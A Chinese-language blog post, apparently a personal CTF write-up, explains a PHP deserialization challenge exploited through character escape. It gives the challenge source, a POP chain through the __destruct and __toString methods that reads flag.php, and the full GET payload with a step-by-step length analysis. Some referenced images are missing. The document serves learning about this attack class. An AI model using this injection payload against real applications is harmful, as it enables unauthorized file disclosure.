今天看了一下安恒的月赛题,真的就看了一下,签到题都没写出来(我哭了)
其中web1是一道PHP反序列化+字符逃逸的题,事后看大佬的writeup看了半天才看懂,现在记录一下。
题目是访问网页直接给的源码:
<?php
show_source("index.php");
function write($data) {
return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}
function read($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}
class A{
public $username;
public $password;
function __construct($a, $b){
$this->username = $a;
$this->password = $b;
}
}
class B{
public $b = 'gqy';
function __destruct(){
$c = 'a'.$this->b;
echo $c;
}
}
class C{
public $c;
function __toString(){
//flag.php
echo file_get_contents($this->c);
return 'nice';
}
}
$a = new A($_GET['a'],$_GET['b']);
//省略了存储序列化数据的过程,下面是取出来并反序列化的操作
$b = unserialize(read(write(serialize($a))));
这题一眼就能看得出来是序列化的题,奈何本人没文化,不知道还有字符串逃逸的说法,我是辣鸡
首先关于反序列化的部分,就是构造这样的代码来运行C()的__toString()方法
$a = new A();
$b = new B();
$c = new C();
$c->c = "flag.php";
$b->b = $c;
$a->username = "1";
$a->password = $b;
echo serialize($a);
O:1:"A":2:{s:8:"username";s:1:"1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}
然后是字符串逃逸的部分,大佬是这样说的:
之后很明显就是字符逃逸了,看下read()和write()方法:
function write($data) {
return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}
function read($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}
可以看到\0\0\0的长度为6,然后chr(0).'*'.chr(0)的长度为3,因此read()方法可以造成字符逃逸。
假设分别传入1和2,得到这样的序列化字符串:
image.png
简单介绍一下原理,字符逃逸需要做的是通过字符串替换,让蓝色的长度为红色字部分的长度,这样就可以在本来的2的部分注入对象,然后进行反序列化。
Payload:
?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}};s:0:"";s:0:"
会得到这样的序列化字符串(每个*左右都有不可见字符%00):
O:1:"A":2:{s:8:"username";s:48:"********";s:8:"password";s:86:"A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}};s:0:"";s:0:"";}
image.png
可以看到,红色部分刚好长度为48,后面就逃逸出去了,而橙色部分正好是读取flag的核心部分
像这个题是长的替换成短的,就把Payload构造到后面的属性上去;如果的短替换成长,比如p3师傅的ezphp,就把注入的部分拼接在当前属性的后面,使它们刚好逃逸出来。
看到这里我还是一脸懵的状态,没办法跟着程序走走看吧
首先按照payload里面的值传入程序
那么对这一句而言$a = new A($_GET['a'],$_GET['b']);a就是\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0,b就是A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}};s:0:"";s:0:"
这没啥问题
然后程序运行$b = unserialize(read(write(serialize($a))));这一句中的serialize($a)结果输出一下是
O:1:"A":2:{s:8:"username";s:48:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:8:"password";s:86:"A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}};s:0:"";s:0:"";}
红色的就是我们填入的部分,是作为引号中的数据,不会成为影响结果的代码,到这里程序一切正常
接着运行下一句write(serialize($a))这一句对我们的程序没啥影响,因为我们序列化的结果里面没有chr(0) . '*' . chr(0)的结构,这一句代码用在下面的情况:
如果一个类有私有属性,那么序列化后就有
chr(0) . '*' . chr(0)这样的结构
然后下一句read(write(serialize($a)))这个时候问题就出现了
这里为了好数数我把chr(0) . '*' . chr(0)写出-*-
你数一下绿色部分就成了引号里面的东西了,password后面的对象就解放出来了,本来这些是数据,不会影响到程序,但逃逸出来后就变成影响程序的代码了,这就是字符串逃逸
然后s:0:"";s:0:"是为了闭合最后的一个"
最后代码继续运行,flag就出来了
